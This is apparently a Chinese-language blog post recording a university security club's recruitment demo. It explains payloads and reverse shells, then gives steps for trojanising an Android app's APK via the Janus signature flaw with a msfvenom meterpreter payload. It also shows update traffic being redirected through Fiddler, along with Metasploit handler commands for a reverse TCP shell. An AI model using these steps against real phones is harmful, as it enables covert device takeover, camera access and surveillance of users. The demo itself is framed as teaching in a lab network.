纳新表演

简介

转眼大三这次协会安全组的纳新该我上了……这里简单的记下安全组的表演内容,也算是没有空了这几天的内容

知识点:
payload:payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。meterpreter就是一种,连接建立后需要使用进程注入、hook等方式转移进程,在win下比较方便实现,android下每个应用权限独立很难注入…..提权才是关键,权限高了随便留后门。
签名:http://xn--74q78i15hxv3arigm4e.cn/2018/03/29/apk%E7%AD%BE%E5%90%8D/
基本的反弹shell方法:把shell给一个端口使用即可,工具比如nc,或者shell本身的命令,或者语言开启某个端口执行去执行sh。基本为先建立tcp连接远处的服务,再把shell的交互给这个端口的流。https://www.freebuf.com/articles/system/178150.html 本质还是依靠应用实现的…输入输出流的重定向问题,cpu角度是各接口的交互

通常 Exp 和 PoC 都是可执行的漏洞利用脚本/程序
区别主要在于是否恶意

PoC 是 Proof of Concept (概念验证)
通常是内含无害的漏洞代码,比如弹出一个计算器什么的

Exp 是 Exploit (漏洞利用)
通常是内含恶意的漏洞代码

基本效果

目标android手机置于与本机同一内网环境下,android手机点击某市场应用的检查更新,下载后安装,android手机被控制。开启摄像头,打开shell

环境要求

android版本<=8.0,安装了蓝墨云3.2.2
pc:虚拟机开kali,桥接模式,ip为192.168.1.p1。主机为192.168.1.p2。
主机安装有fidder、java环境。

操作

构造apk

首先目标apk使用了v1签名,其有漏洞Janus

  1. 应用apk(v1签名)安装时的签名校验,是解压apk,执行文件和目录的校验;未在zip目录中的数据不做处理
  2. 应用执行时,虚拟机可直接执行Dex文件和apk文件

这使得可以任意执行代码并不会有任何与正版的区别。
精心构造dex使得java字节码与目标应用xml声明吻合即可执行,注意字节码中使用的都是全名,java代码里用包简化了而已。dex的代码直接用msfvenom的
因为还是属于应用进程因此权限受应用管制,最好配合提权漏洞,但提权漏洞已经不好找了…
dex与源apk结合生成目标apk

搭建监听环境

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.118
set lport 4444
exploit
meterpreter

本地服务器
ip本机:192.168.1.113
java服务器/ 4000
在根下放1.apk

fillder
开启代理,配置完记得重启,
手机只要在同一网段下就可以,连wifi即可
规则:
右键一个解锁编辑,在TextView中改:
http:\/\/192.168.1.113:4000\/1.apk
拖入AutoResponder,AutoResponder上面俩个全选
保证点更新后地址被修改即可

手机

登录蓝墨云点击更新,结束